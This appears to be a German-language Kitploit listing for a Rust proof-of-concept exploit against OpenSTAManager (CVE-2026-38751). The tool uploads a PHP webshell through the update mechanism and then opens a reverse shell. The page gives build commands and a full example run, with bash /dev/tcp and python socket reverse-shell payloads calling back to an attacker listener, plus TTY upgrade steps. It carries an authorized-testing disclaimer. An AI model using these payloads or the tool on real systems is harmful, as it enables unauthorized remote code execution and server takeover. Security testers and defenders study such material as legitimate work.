Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
OpenSTAManager-RCE-Exploit-CVE-2026-38751 — OpenSTAManager-RCE-Exploit-CVE-2026-38751 | Kitploit
Tools/GitHubGitHub/b0ysie7e/openstamanager-rce-exploit-cve-2026-38751
SchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed TeamingPayload-Entwicklung
GitHub
b0ysie7e/openstamanager-rce-exploit-cve-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

Repository anzeigen
8vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

OpenSTAManager RCE Exploit (CVE-2026-38751)

Beliebiger Datei-Upload, der zu Remote-Codeausführung führt
Vollständiger Proof-of-Concept für CVE-2026-38751, geschrieben in Rust.

** Warnung**: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bestimmt. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben.


Beschreibung

OpenSTAManager ≤ 2.10 ist anfällig für einen authentifizierten, beliebigen Datei-Upload, der es einem Angreifer ermöglicht, ein bösartiges ZIP-Archiv mit einer PHP-Webshell hochzuladen. Dieser PoC automatisiert den Prozess:

  • Anmeldung mit gültigen Anmeldeinformationen
  • Hochladen eines bösartigen Moduls mit einer Webshell
  • Überprüfen der Schwachstelle
  • Interaktive Webshell (Befehlsausführung)
  • Reverse Shell mit TTY-Handling (mehrere Payloads)
  • Bereinigen der hochgeladenen Hintertür

Funktionen

FunktionBeschreibung
AnmeldungAuthentifiziert mit den angegebenen Anmeldeinformationen.
ZIP-ErstellungErstellt eine ZIP-Datei mit einem gültigen MODULE-Deskriptor und einer PHP-Shell.
Datei-UploadSendet das bösartige ZIP über den Aktualisierungsmechanismus.
VerifizierungÜberprüft, ob die Shell erreichbar ist, und führt einen Testbefehl (id) aus.
Interaktive WebshellErmöglicht das interaktive Ausführen von Befehlen über die Webshell (-i).
Reverse ShellSendet mehrere Payloads (bash, python, base64, nc, mkfifo), um eine Shell zu erhalten.
TTY-Upgrade-AnleitungZeigt eine Schritt-für-Schritt-Anleitung, um eine vollständig interaktive TTY zu erhalten.
BereinigungEntfernt das hochgeladene shell.php automatisch (sofern nicht --no-cleanup verwendet wird).

🛠️ Voraussetzungen

  • Rust (1.70+)
  • Ein Ziel, das OpenSTAManager ≤ 2.10 ausführt.
  • Ein gültiges Benutzerkonto (mit Passwort) zur Anmeldung.

Installation

Klonen Sie das Repository und erstellen Sie die Binärdatei:

root@kitploit:~
git clone https://github.com/yourusername/OpenSTAManager-RCE-Exploit-CVE-2026-38751
cd OpenSTAManager-RCE-Exploit-CVE-2026-38751
cargo build --release
./target/release/openstamanager-rce-exploit --help

Beispiel:

root@kitploit:~
$ ./openstamanager-rce-exploit --url http://target.com/ -U <user> -P <password> --lhost 10.10.14.5 --lport 4444

[ OpenSTAManager RCE Exploit : ]

Target: http://target.com/
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 500 Internal Server Error
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Listening on 10.10.14.5:4444...
[*] Trying payload: bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
[-] Payload failed: operation timed out
[*] Trying payload: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[-] Payload failed: operation timed out
[*] Trying payload: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[+] Payload sent successfully. Waiting for connection...
[+] Connection received from 10.129.19.238:55758
[*] Sent 'script /dev/null -c bash'

[*]
[*] Reverse shell established.
[*] To get a fully interactive TTY:
[*] 1. Press Ctrl+Z to suspend the shell.
[*] 2. Run: stty raw -echo; fg
[*] 3. When prompted for terminal type, type: xterm
[*] 4. Export: export TERM=xterm SHELL=bash
[*] 5. Adjust rows/columns with: stty rows <rows> columns <cols>
[*]    (Get the size with: stty size)
[*]
[*] Press Ctrl+C to exit and cleanup the webshell.

bash: cannot set terminal process group (1481): Inappropriate ioctl for device
bash: no job control in this shell
www-data@target:~/html/openstamanager/modules/shell$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@target:~/html/openstamanager/modules/shell$ whoami
whoami
www-data
www-data@target:~/html/openstamanager/modules/shell$
Tool herunterladen